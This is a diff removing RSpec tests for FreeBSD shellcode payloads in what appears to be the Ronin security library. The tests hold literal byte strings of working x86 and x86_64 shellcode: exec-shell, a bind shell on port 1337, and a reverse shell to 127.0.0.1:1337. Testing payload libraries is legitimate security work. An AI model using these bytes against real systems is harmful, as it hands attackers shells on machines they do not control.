- "\xeb\x64\x5e\x31\xc0\x88\x46\x07\x6a\x06\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2\x31\xc0\xc6\x46\x09\x02\x66\xc7\x46\x0a\x05\x39\x89\x46\x0c\x6a\x10\x8d\x46\x08\x50\x52\x31\xc0\xb0\x68\x50\xcd\x80\x6a\x01\x52\x31\xc0\xb0\x6a\x50\xcd\x80\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03\xbb\xff\xff\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\x97\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23".b
51
- )
52
- end
53
-
54
- it "must ensure #payload is an ASCII 8bit string" do
55
- expect(subject.payload.encoding).to eq(Encoding::ASCII_8BIT)
56
- end
57
- end
58
- end
@@ -1,46 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/shellcode/freebsd/x86/exec_shell'
3
-
4
- describe Ronin::Payloads::Shellcode::FreeBSD::X86::ExecShell do
5
- it "must inherit from Ronin::Payloads::Shellcode::ExecShellPayload" do
6
- expect(described_class).to be < Ronin::Payloads::Shellcode::ExecShellPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'shellcode/freebsd/x86/exec_shell'" do
13
- expect(subject.id).to eq('shellcode/freebsd/x86/exec_shell')
14
- end
15
- end
16
-
17
- describe ".arch" do
18
- subject { described_class }
19
-
20
- it "must equal :x86" do
21
- expect(subject.arch).to be(:x86)
22
- end
23
- end
24
-
25
- describe ".os" do
26
- subject { described_class }
27
-
28
- it "must equal :freebsd" do
29
- expect(subject.os).to be(:freebsd)
30
- end
31
- end
32
-
33
- describe "#build" do
34
- before { subject.build }
35
-
36
- it "must set #payload" do
37
- expect(subject.payload).to eq(
38
- "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80".b
39
- )
40
- end
41
-
42
- it "must ensure #payload is an ASCII 8bit string" do
43
- expect(subject.payload.encoding).to eq(Encoding::ASCII_8BIT)
44
- end
45
- end
46
- end
@@ -1,63 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/shellcode/freebsd/x86/reverse_shell'
3
-
4
- describe Ronin::Payloads::Shellcode::FreeBSD::X86::ReverseShell do
5
- it "must inherit from Ronin::Payloads::Shellcode::ReverseShellPayload" do
6
- expect(described_class).to be < Ronin::Payloads::Shellcode::ReverseShellPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'shellcode/freebsd/x86/reverse_shell'" do
13
- expect(subject.id).to eq('shellcode/freebsd/x86/reverse_shell')
14
- end
15
- end
16
-
17
- describe ".arch" do
18
- subject { described_class }
19
-
20
- it "must equal :x86" do
21
- expect(subject.arch).to be(:x86)
22
- end
23
- end
24
-
25
- describe ".os" do
26
- subject { described_class }
27
-
28
- it "must equal :freebsd" do
29
- expect(subject.os).to be(:freebsd)
30
- end
31
- end
32
-
33
- let(:host) { '127.0.0.1' }
34
- let(:port) { 1337 }
35
-
36
- subject do
37
- described_class.new(
38
- params: {
39
- host: host,
40
- port: port
41
- }
42
- )
43
- end
44
-
45
- describe "#build" do
46
- before { subject.build }
47
-
48
- it "must set #payload" do
49
- expect(subject.payload).to eq(
50
- "\x31\xc0\x50\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2" \
51
- "\x68\x7f\x00\x00\x01\x66\x68\x05\x39\x66\x68\x01\x02\x89" \
52
- "\xe1\x6a\x10\x51\x52\x31\xc0\xb0\x62\x50\xcd\x80\x31\xc9" \
53
- "\x51\x52\x31\xc0\xb0\x5a\x50\xcd\x80\xfe\xc1\x80\xf9\x03" \
54
- "\x75\xf0\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" \
55
- "\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80".b
56
- )
57
- end
58
-
59
- it "must ensure #payload is an ASCII 8bit string" do
60
- expect(subject.payload.encoding).to eq(Encoding::ASCII_8BIT)
61
- end
62
- end
63
- end
@@ -1,46 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/shellcode/freebsd/x86_64/exec_shell'
3
-
4
- describe Ronin::Payloads::Shellcode::FreeBSD::X86_64::ExecShell do
5
- it "must inherit from Ronin::Payloads::Shellcode::ExecShellPayload" do
6
- expect(described_class).to be < Ronin::Payloads::Shellcode::ExecShellPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'shellcode/freebsd/x86_64/exec_shell'" do
13
- expect(subject.id).to eq('shellcode/freebsd/x86_64/exec_shell')
14
- end
15
- end
16
-
17
- describe ".arch" do
18
- subject { described_class }
19
-
20
- it "must equal :x86_64" do
21
- expect(subject.arch).to be(:x86_64)
22
- end
23
- end
24
-
25
- describe ".os" do
26
- subject { described_class }
27
-
28
- it "must equal :freebsd" do
29
- expect(subject.os).to be(:freebsd)
30
- end
31
- end
32
-
33
- describe "#build" do
34
- before { subject.build }
35
-
36
- it "must set #payload" do
37
- expect(subject.payload).to eq(
38
- "\x48\x31\xc9\x48\xf7\xe1\x04\x3b\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05".b
39
- )
40
- end
41
-
42
- it "must ensure #payload is an ASCII 8bit string" do
43
- expect(subject.payload.encoding).to eq(Encoding::ASCII_8BIT)
44
- end
45
- end
46
- end